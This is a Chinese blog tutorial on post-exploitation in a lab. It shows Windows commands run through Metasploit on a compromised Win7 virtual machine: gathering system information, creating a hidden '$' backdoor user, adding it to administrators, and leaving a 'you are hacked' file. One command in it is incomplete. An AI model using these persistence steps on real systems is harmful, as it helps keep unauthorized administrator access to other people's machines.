网络安全与网站安全及计算机安全：如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】（计算机技术与网络安全）

网络安全与网站安全及计算机安全：如何使用Kali Linux获取Windows计算机操作系统管理员权限【维持】（计算机技术与网络安全）

一、背景介绍

Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木码控制受害者主机呢？接下来让我们一起学习！

二、资源装备

1.成功拿下的 Win7虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

三、安全演练

3.1 对拿下的Windows主机，具体操作如下图所示。

步骤1：运行利用模块，如下图所示。

命令：run

步骤2：进入Windows主机的cmd窗口，如下图所示。

步骤3：利用命令查看受害者主机的系统信息，知己知彼对目标受害者主机进行更全面的掌握，更全面的控制目标主机，获取更全面的信息，如下图所示。

命令：systeminfo

步骤4：受害者主机的系统信息如下图所示。

3.2 对受害者主机进行用户管理操作，如下图所示。

步骤1：给受害者主机添加可以隐藏的用户信息，如下图所示。

命令：net user 新用户名$ 用户密吗 /add

例子：net user admin$    12456  /add

步骤2：查看刚才添加的新用户，如下图所示。

命令：net user(因为新建的用户为隐藏用户，所以命令行查看不到该用户）

步骤3：添加不隐藏的新用户，如下图所示。

命令：net user 新用户名 用户密吗 /add

例子：net user admin    12456  /add

步骤4：查看刚才添加的新用户，如下图所示。

命令：net user

步骤5：在受害者主机中利用图形化界面查看刚才新建的用户，可见在该界面是可以看见新建的隐藏用户的（如果需要实现真正意义上的隐藏用户的话需要更改注册表，请持续关注本号后续讲解）

步骤6：删除用户，如下图所示。

命令：net user 用户名 /del

例子：net user admin /del

步骤7：将新建的用户添加到管理员组，如下图所示。

命令：net localgroup administrators /add

步骤8：查看管理员组的用户，如下图所示。

命令：net localgroup administrators

3.3 对受害者主机进行文件操作，如下图所示。

步骤1：新建文件夹

命令：md 文件名

例子：md abc

步骤2：删除文件夹

命令：rd 文件名

例子：rd abc

步骤3：新建文本文件，如下图所示。

命令：echo 文本文件内容 > 文件名

例子：echo hi you are hacked > hk.txt

3.4 对受害者主机进行查看主机名操作，如下图所示。

命令：hostname

​​点我学习专业的Kali Linux安全技术​​

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。